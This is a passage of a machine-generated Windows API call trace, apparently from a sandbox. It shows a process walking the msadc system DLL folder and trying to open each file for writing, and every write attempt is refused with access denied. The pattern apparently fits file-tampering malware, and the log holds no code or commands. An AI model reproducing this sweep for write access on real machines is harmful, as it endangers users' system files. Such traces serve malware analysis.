[0088.680] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.680] GetLastError () returned 0x5 [0088.680] GetLastError () returned 0x5 [0088.680] SetLastError (dwErrCode=0x5) [0088.680] GetLastError () returned 0x5 [0088.680] SetLastError (dwErrCode=0x5) [0088.680] GetLastError () returned 0x5 [0088.680] SetLastError (dwErrCode=0x5) [0088.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0088.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.680] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44060e78, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x44060e78, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x44060e78, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msaddsr.dll", cAlternateFileName="")) returned 1 [0088.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a790 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0088.681] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.681] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.681] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.681] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.681] AreFileApisANSI () returned 1 [0088.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll", lpUsedDefaultChar=0x0) returned 55 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0088.681] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.681] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.682] AreFileApisANSI () returned 1 [0088.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76188 [0088.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll") returned 55 [0088.682] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msaddsr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.682] GetFileType (hFile=0x360) returned 0x1 [0088.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.682] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.682] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.682] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.683] CloseHandle (hObject=0x360) returned 1 [0088.683] AreFileApisANSI () returned 1 [0088.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75cd8 [0088.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll") returned 55 [0088.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msaddsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.683] GetLastError () returned 0x5 [0088.683] GetLastError () returned 0x5 [0088.683] SetLastError (dwErrCode=0x5) [0088.683] GetLastError () returned 0x5 [0088.683] SetLastError (dwErrCode=0x5) [0088.683] GetLastError () returned 0x5 [0088.683] SetLastError (dwErrCode=0x5) [0088.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0088.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.683] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d5b9b4, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41d5b9b4, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41d5b9b4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdaprsr.dll", cAlternateFileName="")) returned 1 [0088.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a2d0 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0088.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.684] AreFileApisANSI () returned 1 [0088.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll", lpUsedDefaultChar=0x0) returned 56 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0088.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.685] AreFileApisANSI () returned 1 [0088.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0088.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll") returned 56 [0088.685] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprsr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.686] GetFileType (hFile=0x360) returned 0x1 [0088.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0088.686] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.686] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.687] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.688] CloseHandle (hObject=0x360) returned 1 [0088.688] AreFileApisANSI () returned 1 [0088.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0088.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll") returned 56 [0088.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.688] GetLastError () returned 0x5 [0088.688] GetLastError () returned 0x5 [0088.688] SetLastError (dwErrCode=0x5) [0088.688] GetLastError () returned 0x5 [0088.688] SetLastError (dwErrCode=0x5) [0088.688] GetLastError () returned 0x5 [0088.688] SetLastError (dwErrCode=0x5) [0088.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0088.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.688] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d5b9b4, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41d5b9b4, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41d5b9b4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x57000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdaprst.dll", cAlternateFileName="")) returned 1 [0088.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0088.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0088.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a238 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0088.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0088.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.689] AreFileApisANSI () returned 1 [0088.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll", lpUsedDefaultChar=0x0) returned 56 [0088.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0088.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.690] AreFileApisANSI () returned 1 [0088.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0088.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll") returned 56 [0088.690] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprst.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0088.709] GetFileType (hFile=0x368) returned 0x1 [0088.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0088.709] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.709] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.709] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.710] CloseHandle (hObject=0x368) returned 1 [0088.710] AreFileApisANSI () returned 1 [0088.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0088.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll") returned 56 [0088.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.710] GetLastError () returned 0x5 [0088.710] GetLastError () returned 0x5 [0088.710] SetLastError (dwErrCode=0x5) [0088.710] GetLastError () returned 0x5 [0088.710] SetLastError (dwErrCode=0x5) [0088.710] GetLastError () returned 0x5 [0088.710] SetLastError (dwErrCode=0x5) [0088.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0088.710] HeapFree (in: 